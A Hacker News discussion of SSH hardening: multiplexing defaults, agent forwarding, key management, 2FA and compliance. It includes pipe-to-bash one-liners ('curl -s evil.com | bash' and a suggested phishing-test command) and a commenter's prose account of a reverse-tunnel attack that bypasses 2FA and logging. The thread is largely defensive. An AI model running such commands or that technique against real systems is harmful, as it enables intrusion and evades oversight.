Hacker News new | past | comments | ask | show | jobs | submit login
SSH: Best practices (blog.0xbadc0de.be)
284 points by cujanovic on Feb 7, 2016 | hide | past | web | favorite | 118 comments

The article didn't make mention multiplexing and MaxSessions defaults in OpenSSH. The default is 10 which means you auth once, and all subsequent logins are without auth and without syslog entries. If you manage secure systems and have 2FA, this allows bypassing 2FA and logging.

All I have to do is trick your folks into testing a ruby / python / perl / bash script for me that will drop a key on your machine, fire up ssh using that key and tunnel back to my host. Now I have full control of your secure (banking, government, eCommerce) environment, completely bypassing 2 factor authentication. Just one link to one of your email distros and up to 10% of your folks will run it.

Combine this with sudo credential caching and now I have root on all of your systems without having to bother finding vulns.

Thx to Prandium for the demo of this simple social engineering exploit.

> All I have to do is trick your folks into testing a ruby / python / perl / bash script for me that will...

...install a rootkit or botnet client regardless of how you've configured ssh.

What does it have anything to do with ssh at all? The attacker could just as easily set up an outgoing VPN-over-TLS in the same way.

The reason that this involves SSH and is in no way related to the malware example you provided is, this is not malware and will never be detected as such. Very few things can actually block this and most of those things are either too expensive, or disabled by most organizations. Also, this is only getting worse with time. More and companies are opening up their firewalls outbound because it makes developers feel warm and fuzzy. No seriously, people are doing real time integration and builds, calling third party sites like github. I can even put my script on github. If I wanted this to persist, I could update your .bashrc or .bash_profile and start up my tunnel again in the background (as you).

Another reason this involves SSH is that you already have it. I am not installing anything. I am just dropping a key on your machine and (as you) spawning ssh and a reverse tunnel back to a VM I control. No need for root :-) Now I just leverage your existing multiplexed connections into your development and production environments. Your syslog server will not log me connecting, since I am just leveraging your existing channelized SSH session.

This is leveraging a bad configuration that everyone has in SSH by default. In most cases, the attacker can also leverage the commonly poorly configured sudo as well.

If my government would give me legal immunity, I would prove this to you by popping nearly every major company or government office in my country in three weeks or less.

If somebody can get you to run "curl -s evil.com | bash" then you are pwned. They can modify your $PATH and install a key logger and create a reverse shell and upload your ssh private key and forward the reverse connection to anything on your LAN. You have already lost.

Keylogger, perhaps. The multiplexing just makes it trivial to connect to everything with no logging and no authentication. I don't even have to modify the PATH or install a keylogger. I am already several steps beyond that in one move. In other words, no audit trail for the FBI to look into, no need to upload some new application, no need to exploit a vulnerable application (beyond the vulnerability of OpenSSH itself by design).

Perhaps some of the confusion here is that it is assumed ssh keys are in use? In an environment that requires 2FA, keys would not be allowed. People would be using RSA Tokens, Duo, Yubikeys, etc. This method bypassing those things.

It also means, anyone using the defaults in OpenSSH is not PCI compliant.

I am not even sure this method of access to development or production environments is even illegal, as the user is providing access and I am not hacking anything, nor am I using authentication into anything. The door is wide open. If this were a game of chess, I would get check-mate in 1 move.

If this were a game of chess, checkmate is getting arbitrary code to run in the context of the user. If you have an existing ssh process running as the same user then you can attach it with a debugger and inject code into it.


A debugger injecting code into a process under the same context isn't a vulnerability. It's supposed to be able to do that. And OpenSSH is supposed to allow you to multiplex sessions. It's a feature.

The vulnerability is the attacker being able to run arbitrary code as the user.

OpenSSH allowing this behavior by default is in itself the vulnerability.

That's a feature, not a bug. SSH is a power tool; if your users can not be trusted with power tools, it is your responsibility to provide them with something brightly coloured, drool-proof and locked down.

Then how do you exploit it without assuming the ability to execute arbitrary code as the user?

Some time soon I will put something up on github so you can test this methodology. It probably won't be tonight though.

"More and companies are opening up their firewalls outbound because it makes developers feel warm and fuzzy." - this is the actual issue, and should fail you in the audit: precisely because it is a major vulnerability which can be abused in 10^128 different ways.

Running around screaming "OMG OMG, the tool designed to tunnel over the network can be used to tunnel over the network, TEH SKY IS FALLING!!1!!!" is even somewhat funny in this context.

I don't recall even remotely suggesting the sky is falling. If nobody fixes this, it doesn't affect me. I have Multiplexing disabled everywhere that I care about.

The constant news of companies getting popped is actually quite entertaining. The only thing folks may be concerned about is that if too many companies get popped, there may be some heavy handed legislation that starts to affect people. Even that I am perfectly fine with.

ahem "It also means, anyone using the defaults in OpenSSH is not PCI compliant."

I wouldn't worry. Not every auditor will catch this.

Well, that's security through obscurity: planning to fail an audit if the auditors dig too deep, but betting on a surface-level inspection.

"I am just dropping a key on your machine" - from my point of view, it does not matter whether you're dropping an executable, an SSH key, or Aunt Matilda: you already have the user executing arbitrary code (your distinction between "here, pipe this code into bash, it will execute" and "here, pipe this code into bash, it will save itself to disk and then execute" is pure handwaving).

(you are likewise assuming there are multiplexed connections, which is a great leap - these are off by default)

What you have demonstrated is the simplest possible botnet technique, using SSH as the transport and social engineering as the vector; for some reason, you consider it groundbreaking. Well, it would have been - in 2000.

This didn't exist in 2000. It was created and made default on the server in OpenSSH 5. OpenSSH 5 did not make it into enterprise distros for quite some time.

There are literally tens of thousands of articles telling folks to enable ControlMaster (Multiplexing) on the client to "make ssh faster". You would be hard pressed to find a devops shop that isn't already using ControlMaster in their ssh client config. There are at least a handful of government and financial sites that set MaxSessions to 1 because they understand the risk.

This specific mechanism didn't exist in 2000; the behavior is no different from the ILOVEYOU virus: user runs code, code does something malicious, code contacts cracker.

It all boils down to "if you require security, you can't have a default-open environment"; blaming a specific tool seems ... strange.

Strange as it may be, this virus will never be detected as a virus. That is why I am blaming the default settings in the tool.

so... your point is "don't run untrusted code"?

You would think that is common sense, right? :-) I so wish more people thought like you.

Get permission from your privacy and legal team before you do this of course. Write a small script in whatever language you like. Encode a ... gosh, don't even get that fancy. Just email them something silly from an external email address like:

    curl -s https://tinyvpn.org/ | bash
Listen for how many mac users around you in your company suddenly start saying, "How do I stop this??" That one is meant for people that don't lock their computers, but the same applies.

"Don't run untrusted code" has been a basic common sense for people since the dawn of the internet, but that doesn't mean you can follow it 100% of the time. It's good to be aware of potential attack vectors, and not just sweep them under the rug of "don't be an idiot".

You run untrusted code whenever your browser loads a web page that uses javascript. With more and more of the web requiring javascript to work, running untrusted code becomes less and less a real option if you want to get any work done.

Arguably, plain HTML is also untrusted code, and I certainly don't trust every single one of the authors of my operating system and all of the os-level utilities and all the applications that I use, especially not Microsoft or Apple. But I'm forced to use them for work.

A year or two ago there was some hoopla about Canonical collecting some information about Ubuntu's users or something like that (don't remember exactly) and a lot of people were up in arms about how they don't trust Canonical. Canonical's reply was one of the most insightful I've ever read on the internet. They said something like, "um... but we've got root".

That's a great point. The makers of your OS, the builders of your apps, they have a lot of power over you that you grant them simply by using their stuff. You're effectively trusting them, even if you don't trust them.

You could react by not using anything that anyone you don't trust writes, or by thoroughly auditing all the source code of everything you use (you do use only open-source software which can be audited by you directly, right?). But this is not really practical for 99% of everyone on the planet.

> They said something like, "um... but we've got root".

Which is incredibly misleading.

Sure, they could put malicious code in their distribution. It could do whatever they want. And then it would be on your machine, where you can potentially discover it and publish what you've discovered and allow others to verify your discovery. Which could cause Canonical to not have root anymore, because people would immediately switch to Debian or CentOS or something else.

But if they send data from your machine to their servers, no one has any ability to determine what they do with it from there, how well they secure it, who they give or sell it to, etc. It's a completely different situation because it goes from trust-but-verify to blind trust.

How many Ubuntu users actually verify everything Canonical sends them? I'd say very close to none, especially for the binaries.

Sure, in principle you could verify. You could read through all the source, you could even disassemble the binaries and read through the assembly (and don't forget to verify the hardware too). Again, who actually does that? Virtually no one.

So the two cases are a lot closer than you paint them to be.

Also, corporations do stupid, illegal, and unethical stuff all the time, even when it's clearly (especially in hindsight) not in their long-term interest to do so. Even when it will clearly destroy their reputation if the public found out they even considered it.

Even if you trust "the system" (which is more of a hope that if there's something malicious, someone out there will detect it sooner or later), there are many cases of vulnerabilities in even open source code going undetected for years... nevermind vulnerabilities in binaries that you don't have code for and who the authors of aren't generous enough to clue you in on.

Canonical (or whatever source you actually get your OS or apps from) could also send you some specially crafted something that no one else gets. Now who's going to verify it for you if you don't do it yourself? How are you ever going to find out, if you're not one of the ultra-paranoid and super-skilled 0.001% of Ubuntu users with infinite time and determination who actually verifies 100% of what Canonical sends them? You just won't. And if you did, there'd be a hundred new Ubuntu versions out by the time you finished verifying even one of them.

People trust, but they very rarely verify. The size of operating systems and applications and the skill to verify have all just grown too large to make it practical for the overwhelming majority of people.

I do see your point about Canonical doing whatever they want with the data they collect. That's certainly problematic. But that doesn't mean that there aren't major privacy or security issues with trusting Ubuntu (or any other OS) not to have malware on it.

> Virtually no one.

Which is not the same thing as no one. And it only takes once to ruin your reputation forever (see also Sourceforge, Lenovo, etc.) Moreover, the probability of detection doesn't have to be very high at all because the cost to Canonical would be catastrophic, so any possibility whatsoever acts as a deterrent. And more so in this context because of the nature of the user base.

Your argument seems to boil down to the position that it doesn't hurt anything to go from detection not perfect to detection not possible.

Developer laptop compromise is probably the biggest security risk that any startup company faces, because the developer laptop is an uncontrolled environment with a lot of "attack surface" which may have been previously compromised.

In my view there are emerging best practices in this area. There are two ways to reduce this risk and both are controversial:

1. Force developers to only develop software using an SSH terminal (by first connecting to a developer VPN via 2FA and then sshing into their secure development environment where may use tools like tmux, vi, and their programming language of choice to get the job done). In this scheme copying source codes or security credentials to a developer laptop is considered a violation and becomes a fireable offense no questions asked.

2. Require all developers to run a private USB-bootable linux desktop shell which is known to be clean. In this case they remain free to utilize modern desktop editors and code emulators (such as android simulator). It's even possible to setup secure persistence in these environments so that the developer's browser configuration, network/vpn config, dotfiles, apt installs, etc are stored on an encrypted filesystem on USB device. The reason why a USB image is preferred is because it's annoying to ask a new employee to repartiation her personal harddrive.

My suspicion is that as more of the tools developers need to rely on are cloud-based: (example: github, cloud9, jenkins, etc) we will eventually see these modern best practices against client-side attacks being adopted more broadly. The quality and reliability of hot-bootable ultra secure cloud operating systems has gone thru the roof over the past couple of years and I assume this trend will only accellerate due to the fact that Google Chrome OS continues to penerate more of the market and consumers are getting used to it.

TLDR: ssh keys existing on developer harddrives is an info-sec anti-pattern, they should only ever exist in system memory or in an encrypted partition on a USB stick.

(Disclaimer, unicorn employee.) I'm confused. Are you implying people write company code on personally owned laptops? That's insane!

1. Company walks you through setting up FileVault (with key escrow) and VPN client, generating and uploading SSH public key immediately after unboxing laptop.

2. OneLogin + Duo (or pick your SSO/2FA scheme) for everything - internal webapps, GMail, etc.

3. SSH keys managed by Puppet.

4. 2FA verification of SSH logins (using pam-interactive), through a bastion (provided .ssh file makes it transparent), with OSX's default SSH agent, with pretty much all of those best practices configured except smartcards/certs.

5. Engineers have SSH access only to utility/development boxes. You can deploy code to production through a webapp (identifying the commit ID) but you can't get a shell as your application's user, and certainly not root.

6. Webapps moving behind a VPN.

In the rare case that you need to debug in production beyond what you can get from metrics/logs, you pair with a "blessed"/senior sysadmin type.

Thank you for this. I suppose I should have included the caveot that my rant applies mostly to early stage shops which are aren't ready to build out and ship a shiny new dev machine for every employee. Another problem for smaller startups is that if you're not careful almost everybody ends up being "blessed". And simply being a senior sysadmin type doesn't mean that you're automatically immune from all forms of social engineering attacks. I suppose your point is that even very early companies should opt for standardized hardware, I think you're right.

I <3 Duo Security.

If you are using an ssh agent, it is a good idea to delete the keys when you lock the screen or sleep your laptop. On Mac OS X you can do this with Hammerspoon: http://fanf.livejournal.com/139925.html

3. Never grand direct SSH to access the the staging/production environment.

Automate the build and deployment environment on a system that developers don't have direct access. Instead of pushing changes, the bot pulls a specified release branch, builds, tests, and deploys the code. All without human interaction.

If malicious code were somehow introduced from a developer's environment, it would be recorded and reflected in the commit history.

AFAIK, that's how GitHub manages deployments via HubBot. See https://www.youtube.com/watch?v=NST3u-GjjFw.


To take things a step further, public-facing environments should be made immutable wherever possible. With the entire system being built and released as a whole. Docker alleviates some of the complexity and overhead but I think this space is where Unikernels have a lot of potential to shine.

There's a very good talk about how the Wunderlist team used chaos and frequent destruction of their envronments to overcome fear and uncertainty here. https://www.youtube.com/watch?v=RrX_28s70ww&app=desktop.

Emphasis being placed on the the frequent disposal and recreation of environments rather than building long-running persistent environments.

This setup probably won't work for long-lived systems (ex databases). In those cases, access via a transient environment like a USB bootable OS would be ideal to prevent persistent viruses/trojans. Ironically, the best current options are security-focused distros like KaliLinux that put a special emphasis on avoiding persistent state. Maybe one day soon we'll see an admin-focused OS that better fits this role.

> 3. Never grand direct SSH to access the the staging/production environment.

Most complex systems fail in unexpected ways, and the best way to debug is to grant the devs access to production machines. It can be temporary, monitored and through a secure channel, but it's still something most organizations can hardly live without.

I think that this issue is potentially moot if you've transitioned to immutable deploys. Under such a system, arbitrage steps would tend to change from the standard have an SA/Dev ssh in and muck around until the issue is found. Instead, first step may be just redeploying (in case of transient/intermittent issues that are disrupting service), and then checking out the production system locally to do root cause analysis.

So yeah, most organizations couldn't do this today, because they don't have the deploy process in place. But when an organization has made the switch, then it is much more realistic to assume that it can get along without granting ad hoc ssh access to production systems.

Exactly. It's also possible to capture stack traces remotely from a running system and/or after a crash. http://techblog.netflix.com/2015/12/debugging-nodejs-in-prod....

Hopefully, this practice -- and the tools required to make it happen -- get better with time.

> Developer laptop compromise is probably the biggest security risk that any startup company faces, because the developer laptop is an uncontrolled environment with a lot of "attack surface" which may have been previously compromised.

It's also the least likely to happen. Attackers will have broken deep into your database due to poor webapp security before getting a hold of your ssh private key.

Not that SSH security doesn't matter. It's easy enough and carries enough risks that putting some effort into it is worthwhile.

I think that unfortunately you're mistaken. If all you do is sit and look at log files all day you can come off with this impression because you see so many scans go by, but that creates a bias in your thinking which doesn't line up with the facts.

A motivated attacker will always tend to try the "low tech" approaches first to rule them out as a first step because it it doesn't require as much sophisticated technical attention and in addition it's a well known fact that human beings are more often than not the weakest link in the chain of security.

It goes something like this:

1. enumerate the employees.. in other words build a list of all their work emails and try to obtain their personal emails and those of their spouses and children.

2. investigate the background of executives so that a compelling phishing email message can be crafted which looks like it originated from high up within the organization.

3. Send targeted phishing emails designed to bait people within the organization to visit webpages that exploit Adobe Flash attack vectors or other browser based vulnerabilities, or perhaps even lure them into installing a trojan directly.

4. after someone in the organization falls victim to the client-side attack, read their emails to learn more about the organization's structure so that your next phising attack can be more refined, specific, and compelling and can possibly utilize a real corporate email address.

5. Rinse and repeat until you eventually gain access to a developer laptop where you can grab production environment SSH keys. Now you own the network without even having to scan a single server and without leaving a trace in the log files.

You're describing the workflow of an APT attack. Those are extremely costly, take several months to complete and definitely involve highly technical skills. I agree they are a real threat, but not to startups, to Fortune 500 companies.

For startups, the #1 risk is a vulnerability in some web app, or a forgotten admin panel, that leaks the entire database to an attacker. Not a complex attack conducted by a nation-sponsored offensive team.

But again, SSH security matters, you should take it seriously.

I think that "APT" is just a fancy new word that describes a very old methodology that has been commonplace since the earliest days of computer crime. If you read about Kevin Mitnick for example he was doing this stuff in his early teens.

I think that you may have a dangerous attitude about it because in modern times it's not a question of whether or not you're a big enterprise or a startup it's a question of whether or not the dataset at the nucleus of your system would be valuable on the black market or not. If an attacker or group of attackers thinks that your dataset could be saleable one day in the future as your company continues to grow then instead of trying to buy your equity on the secondary markets they may invest in trying to "own" your infrastructure now before you become big enough to put your employees thru white-hat training around social engineering.

I suppose my point here is that it does make sense for startups to put their team through proper white-hat training but it doesn't have to be expensive because you can roll your own. What I suspect is that in 10 years or so this kind of anti-social engineering training will be a standard for any IT knowledge workers not just programmers and will likely be part of the job interview process.

We are aruging over something moot though, since we both agree.. take it seriously.

It's all a matter of prioritization. In an ideal world, address all the issues and be perfectly secure. But if you have to choose by priorities, private ssh key compromise is not exactly at the top of my concerns because people are generally careful about their keys.

I argue leaking SSH key is not the worst nightmare but definitely one of the top five on anyone's list. I am more worried about source code and database leaks through development cycle. Copied production data to dev environment and clone source code to your laptop. How does Google/Facebook handle this? I can't imagine anyone cloning their 30G or whatever size single-branch repository down to laptop (they may do shallow clone but doesn't matter).

yeah - the link seems to be hugged to death or something

I just noticed this an hour ago. Bad config on the server and too little ram. The link should work better now.

The part about gateway hosts says:

  > Host B
  >   ProxyCommand ssh -W B:22 A
That could be improved:

  > Host B
  >   ProxyCommand ssh -W %h:%p A
Then you can use wildcards for B ("Host 10.11.12.*"), and use custom ports ("ssh -p 2222").

I thought using per-service SSH keys was an useful mitigation against e.g. GitHub public keys being exposed:

- https://blog.benjojo.co.uk/post/auditing-github-users-keys

- http://arstechnica.com/security/2015/06/assume-your-github-a...

- https://news.ycombinator.com/item?id=9645703

Public keys being exposed isn't something I think needs to be mitigated. That's the whole point, they're public.

Security is not binary. In this case it depends on whether disclosing your identity to the servers you connect to is a problem in your threat model.

Saying "they are public so it's ok" is technical oversimplification.

It's not binary, but if your security depends on your public key being secret, something else must be wrong. It's the same as someone who depends on their IP addresses being secret. That's not something you can count on, and your security would be better served by designing your infrastructure with the assumption that it's totally public information.

> public key

The word public is just a name for a kind of key defined in the field of cryptography and doesn't necessary hold the same connotation in application protocols that use public key cryptography. One example would be ephemeral public key that would have to be kept private to be able to retain forward secrecy (although in such schemes DH is usually used).

Consider as well this situation that is closer to SSH. Suppose that you are MS dev working on NT kernel that by night also want to anonymously contribute to Linux. Obviously both camps would not like you to do that for fear of copyright infringement but OpenSSH shouldn't betray you anonymity that could be reasonably expected. It's imaginable that only one public crypto key pair would be needed to authenticate the server if password authentication is used for the client. The user doesn't expect the client software to silently generate key pair, much less that the same pair is used for every domain because the pair is not strictly needed. Although the user should inform himself how the software works a good software similarly shouldn't work in ways that are reasonably unexpected to people that are familiar with the domain. Ideally, if OpenSSH developers can't really foresee it working any other way OpenSSH should at least explicitly inform the user which public key will be used in connection before it is established in order to not assume the consent of poorly informed users.

> Saying "they are public so it's ok" is technical oversimplification.

It's not. The whole idea of the scheme is that you can publish them everywhere with no risk.

In case of Bitcoin pubkeys you don't want to publish them anywhere for privacy reasons (that turn into real physical security reasons once you have enough BTC). Also, notice how pubkeys are normally hidden under hashes and revealed only at spending time. This drastically limits attacks on ECC if/when some weakness in curve math is discovered. And if quantum computer is invented tomorrow, people can safely transition funds to a new signature scheme by introducing 2-phase commitments to safely reveal (now crackable) ECDSA pubkey after another transaction was made with commitment to concrete signature (preventing double-spend attempts using a cracked key).

OMG, people! "Public" in "public key" doesn't mean that you should share it with the whole world, it's just because it's an antonym of "private key", meaning that the other party you want to communicate with doesn't need to have a pre-shared secret key with you. Other party may be the whole world, but may be not. How public key is used is up to a protocol and threat model: it may as well be secret, and yes, in some protocols and threat models security can depend on public key being secret, and it's not wrong, and not "security by obscurity".

"Could be known to an attacker" is not the same as "Is known to an attacker". Certainly, the more determined your attacker is, the more those two converge, and thus you should treat them as indistinguishable in defender against determined attackers. But by Github publishing all users' public SSH keys, they've made the "could be known" into "known" for even casual attackers.

Well, it's not necessary (or even good) to have a Single Master Ssh Key For Everything, right? ;)

Exposing shared public keys creates an information leak; it allows attackers to probe for valid and usable username/key combinations on your servers (and thereby discover valid usernames). This may be a trivial information leak or it may be one that you consider important; it depends on the situation.

Not sharing public keys between different services and contexts (eg not using your Github keys for anything else) mitigates this risk significantly.

> Exposing shared public keys creates an information leak; it allows attackers to probe for valid and usable username/key combinations on your servers (and thereby discover valid usernames).

How? That's now how public key auth works...

> Not sharing public keys between different services and contexts (eg not using your Github keys for anything else) mitigates this risk significantly.

This is true for other reasons, and you can automate it with some shell scripts.

It's how the SSH protocol itself works. When the client connects to a server, it sends the (remote) username and then a series of public keys. If the server will accept the current public key, it asks the client to authenticate with that key to show that you hold the private key; if it doesn't, it says 'try again'.

This means that a malicious client with just the public key can probe to see if a server will accept a given username/public key combo. If the server does, it will challenge you to authenticate that you hold the private key (which you'll have to fail, since you don't have it).

> It's how the SSH protocol itself works. When the client connects to a server, it sends the (remote) username and then a series of public keys.

Well that's an ... interesting (read: stupid) design choice. I get that it reduces load on the server, but how many public keys is one user likely to have? Surely you could do something with ring signatures to make it not even require knowing which key was used?

I think if you consider leaking usernames to be an important risk, there is probably some other problem. Your username can probably be easily guessed based on your email address or first and last name anyway.

My point is you are better off designing things assuming that usernames and public keys are public information. That doesn't mean you have to go publish them on your website, but you also don't need to worry about mitigating it if someone else does.

Here's a brief guide for setting up SSH with YubiKey as a smartcard which complements this article nicely - https://github.com/drduh/YubiKey-Guide

Thanks for the link! I wish this was a little bit easier though. One of my coworkers still prefers a password list in notepad vs key-based authentication. This looks quite complicated.

Looks like I'd need to configure gpg to use it locally first.

One of the main uses of smartcards is to use it on other machines (eg: not mine). What's the added benefit of adding one if I'm logging in from my local machine?

For what it's worth, most smartcard applets don't typically store GPG objects but RSA keys (and also usually X.509 certificate objects that go along with them, as well as less-used RSA public key objects).

I use PIV (NIST SP 800-73) compliant smartcards with a PKCS#11 module I wrote (CACKey), it just works with "ssh-add -s /path/to/libcackey.so", then SSH away.

Additionally, there is a fork of OpenSSH called PKIXSSH that adds X.509 certificate support (in addition to the relatively recent, compared to the fork, support for OpenSSH certificates) and then I can authenticate to remote systems using my certificate -- which is helpful when my card is replaced, or if my certificate is revoked the CRLs can be used.

Good advice, except the "remove all system passwords" part. Do not do this. It's a really bad idea. There are occasions where you do need to authenticate using a password, most importantly on the local console - what if your server lost network access?

And that sudo workaround is bad since it requires agent key forwarding, which you shouldn't use for the reasons the author himself noted a few paragraphs up.

Weird, where I work we're not allowed to use key auth. They claim it's for PCI since they can't enforce that the keys are passworded/encrypted.

They are correct. You can't enforce passphrases (at all) on ssh keys, nor can you enforce key rotation unless you have a system that issues both the public and private keys. Even then, the user can simply re-sign the key and remove the passphrase. SSH Keys used correctly can be more secure than 2FA, but I have yet to see anyone actually use them correctly. If you are honest with yourself, you know that most of the folks in your org don't have passphrases on their SSH keys. It is easy enough to test if you have something managing their laptops.

Ironically, things done for PCI/ISO27K compliance very often decrease security. Maybe not always, maybe not everywhere, but at least that's my experience with the companies I worked at and is also in line with the stories I heard about other companies.

Quite recently: Security was concerned about enforcing ssh key rotation and was pushing for sysops to generate and store (obviously - unencrypted) private keys for all users on a central jump host and provide users access to that host using passwords (for which enforcing lifecycle policies is easier).

I agree with that. Folks are forced to create little isolated environments that are less likely to be patched or monitored, for fear of bringing more systems into PCI scope.

That is slowly starting to change however. PCI DSS 3.0 gets a bit more specific and starts to go down some technical rabbit holes. PCI DSS 4.0 will be even more specific and have more technical requirements (vs. checkboxes)

That's an odd tradeoff. I'm going to have to disagree with the sibling noting that "compliance != security".

Here's the thing: they say they can't enforce users to encrypt passwords (hogwash; you can have a local agent that checks that), but do they check that users are providing good passwords? I have much more faith in a randomly generated key than I do in a human-generated password. The former pretty much requires compromising the machine; the latter I can just take pot-shots at the server with. (They do rate limit your SSH password attempts, right? right?)

Even if we assume that the password is good, and that the server won't allow infinite tries to guess it, the security is only equivalent: compromise of the user's local account will reveal the password (just sniff the password) or the key (just read the keyfile, and sniff the password if it is encrypted). I don't see any world in which a password is more secure than a key.

The parent comment is discussing encryption of the private key with a password, not passwords for connecting to the server.

The parent is discussing both, and I am too; specifically, the parent says,

> we're not allowed to use key auth.

i.e., they're using password based auth.¹ The point of my post is that while certainly users leaving the private key unencrypted isn't good, trading that for password auth leaves you in a worse state overall (IMO).

¹Of course, they could be using an auth scheme that is neither password nor key based. But given that the parent didn't come out and say that, my gut says that's not the case here.

You could require both pubkey + password:


I believe this was attempted, but they were running an older version of openSSH that was only getting security patches. OTP was not being triggered if an SSH key was used. so it was either password + OTP or ssh-key alone. They opted to disable ssh-key auth as the solution

There's nothing in PCI which prevents the use of SSH keys. In no scenario is password auth more secure than key auth.

There is a step where the auditor will observe you entering a correct and an incorrect password to enter the systems. If your org is depending on SSH key passphrases for this step and you get the wrong person in front of the auditor (the one without the passphrase on their key) then you just failed the audit. The more steps you fail, the deeper down the rabbit holes they go with each step. If they see you are not failing, it will be a check-box exercise. Each auditor is a little different of course; but generally speaking, this is true.

What happens if an ssh agent is used? pageant requests the passphrase and then leaves it unlocked. Or is this audit step set up so I can remove the key from my agent and then demonstrate that I need a proper password to get in?

Compliance has very little to do with actual security unfortunately...

I've worked with an organisation with the following rules.

A user wants to write an SQL query. The user writes it in notepad or whatever, and saves it in a .sql file. The user then will right click on this file they just created, and hit "Scan with McAfee antivirus". If the .sql file they just created comes up clean, they can then open it in SQL Manager and execute it. If they want to then adjust the query, they have to close the file and start over, running the scan again. People can and have been fired over getting lazy about that process.

There's a security consultant with a clipboard who firmly believes this improves security.

I facepalmed so hard my forehead hurts

The same link is somewhere in this guide, too. This guide has a broader scope, though.

Also, move sshd to a random & rarely-used TCP port. Won't help much against a skilled & determined targeted attack, however the "security through obscurity" is not entirely worthless. Using something other than 22 is quite effective at avoiding spray-n-pray scans and exploits.

For extra credit, set up port knocking.

Choosing to only bind SSH to a VPN interface is another option. If you can utilize a VPN that incorporates 2FA then that's even better. Projects such as zerotier are going a long way towards making this kind of thing easier to setup.

Then the VPN breaks, and you're out of luck.

SSH's new AuthenticationMethods directive is extremely useful for pairing SSH keys with a password and/or 2FA. You should absolutely use keys everywhere, and encourage your users to encrypt their keys, but enforcing a password as well ensures that logins are "something you have" (the SSH key) and "something you know" (the password) as a sort of 2FA.

As a cherry on top you can put the password in LDAP or RADIUS server and hook up traditional 2FA (Google Auth, Yubikey, Email, SMS) for that legendary 3FA (ah... "something (else) you have"). Sounds hokey, but defense is best in depth.

Something you have plus 2 things you know does not turn 2FA into 3FA. It's still 2FA - it's just somethings you know instead of something you know.

3 FA is :

* Something you have (normally one OR MORE user IDs)

* Something you know (normally the associated password or passwords for the user ID(s))

* Something you are (normally biometric)

[edit: technically, it's multi-factor when using multiple user/passwords - here's a useful link https://pciguru.wordpress.com/2010/05/01/one-two-and-three-f...]

I look at biometrics as just another category of of the 2nd factor: things you have.

You have your fingers. You have your eyes.

In fiction and movies, these things that you have which could be taken from you (your fingers severed, your eyes plucked out) and used for getting past biometric scanners.

In real life there are easier, stealthier, and less gruesome methods for getting those things: just copy them. (gummy bear fingerprints, anyone? [1][2][3])

[1] - http://www.theregister.co.uk/2002/05/16/gummi_bears_defeat_f...

[2] - http://www.cryptome.org/gummy.htm

[3] - http://www.it.slashdot.org/story/10/10/28/0124242/aussie-kid...

Unfortunately biometrics are near to useless for remote authentication. The only context in which biometrics work is when the whole authentication chain (reader, cable, computer, network) is tamper-proof. When one of these elements can be tampered with (e.g. unplugging the fingerprint reader and sniffing to the USB traffic), it becomes "something you know, that anyone can collect, that you can reproduce with an HD picture, and that you cannot revoke without losing your physical integrity".

I think biometrics may have a place in tamper-proof devices like iphones (infamous error 53) or biometric smartcards (need fingerprint to unlock secrets).

Org question. We use a shared key and a shared account to manage our servers. When someone leaves the team we have to regenerate the key for the account. I'm sure it's not recommended, so what's a good way to manage ssh access in a team setting? I'd like avoid sharing the key so that access can be revoked from user without regenerating the key for everyone?

Have each team member generate his own key. Copy everyone's key in a folder and have a script to generate an authorized_keys file. Use puppet or chef (or anything else) to dispatch the authorized_keys on every server.

A single shared key is a security disaster waiting to happen.

did you read the article? ssh certificates with revokation are a much more workable solution

I wrote the article.

There's the up-front cost of setting them up, and perhaps tool support (pubkey/agent auth is widely supported; X.509...not so much).

ssh certificates are not x.509, though they are designed around a PKI.

Thanks for the correction.

SSH actually supports the usage of certificates that you can use to sign individual keys with a finite lifetime and key revocation. For some reason, very few people know about this and assume SSL/TLS whenever you say "certificates".

You can read about this in the `CERTIFICATES` section of ssh-keygen(1).

We have a shared account to manage servers as well. However, the individuals still have individual accounts, and individual SSH keys. They log in as themselves, and `sudo -iu` into the shared user. This can be done without giving the user root (i.e., sudo supports only giving access to the shared account).

It's still not a great setup, because it makes auditing a nightmare. (Unfortunately, a particular software package we use essentially requires it due to its bad architecture.)

> f=$(mktemp) && ssh-keyscan korell > $f && ssh-keygen -l -f $f && rm $f

> Unfortunately ssh-keygen does not support input from stdin, so this example is slightly more complicated than it should.

Any shell that supports process substitution can fix this for you with something like;

ssh-keygen -l -f <(ssh-keyscan korell)

How about https://github.com/ccontavalli/ssh-ident ? Is that still a "best practice", since the author doesn't mention it in this blog entry?

I didn't know that tool. Having different agents for different projects may be useful, especially if you're using Agent Forwarding.

I don't like that you have to alias ssh or replace /usr/xxx/bin/ssh with a symlink to make it work.

Great post!

BTW, you can also now use hardware devices (like TREZOR and KeepKey) to perform "ssh-agent" functionality in hardware, with minimal setup work.

Blog post: https://medium.com/@satoshilabs/trezor-firmware-1-3-4-enable...

Source code: https://github.com/romanz/trezor-agent (the README has several demo screencasts).

I remember reading about a tool Instagram used for SSH management, but that might not be a "best practice". (http://instagram-engineering.tumblr.com/post/11399488246/sim...)

And yet we still see things like https://blog.binaryedge.io/2015/11/10/ssh/

It would be a cool to have a `forward agent connection once` option to ssh. when I know I'd have to `git pull` once on the server but don't need the agent forwarding after that.

>Do not SSH cross-server

This doesn't make sense. You can safely setup SSH agent forwarding to ssh from server to server without storing your ssh private key anywhere but your local host.

If the server you're forwarding your agent to is compromised it can now talk to your agent. This point could also be 'assume gateway servers are compromised'.

If your gateway servers are compromised to this degree you have a much larger problem than your ssh agent being compromised.

But the article suggests to use ssh-agent.

Has anyone used ProxyCommand to chain through 2 or more gateways and has a config example to show?

I had one a long time ago, from before ssh -W, which I updated for the occasion:

Host <asterisk>+<asterisk>

ProxyCommand ssh -W $(echo %h | sed 's/^.<asterisk>+//') $(echo %h | sed 's/+[^+]<asterisk>$//;s/\([^+%%]<asterisk>\)%%\([^+]<asterisk>\)$/\2 -l \1/;s/:\([^:+]<asterisk>\)$/ -p \1/')

Use with:

$ ssh login1%host1:port1+login2%host2:port2+login3%host3:port3+host4:port4 -l login4


Edit: there is apparently no way to escape asterisks, so I replaced them with <asterisk> (hopefully I didn't miss one), but you'd better check out the link.

What amazes me about these articles is that they keep recommending NOT to use password-based logins for SSH: Why are people still using that?

People are still using FTP, for what it's worth. In other words, the same old: ignorance ("we've always done it like this") and/or apathy ("meh, we're not a cracker target").

Still a big fan of the BetterCrypto guide: https://bettercrypto.org/

I'm not sure what there is to recommend about this Applied Crypto Hardening guide, which seems to be in draft form. The section on SSH is just a couple of snippets from sshd config files with no explanation about the choice of parameters. And copy-pasting config file snippets from a random guide book hardly consistutes security best practice.

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact